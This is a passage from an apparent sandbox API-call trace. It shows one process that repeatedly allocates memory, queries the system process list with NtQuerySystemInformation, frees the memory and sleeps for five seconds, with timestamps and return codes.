SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.788] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.795] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.803] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.810] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.818] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.830] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.837] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.846] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.853] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.861] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.870] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.880] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.904] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.913] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.922] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.932] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.940] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.947] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.954] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.962] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.968] 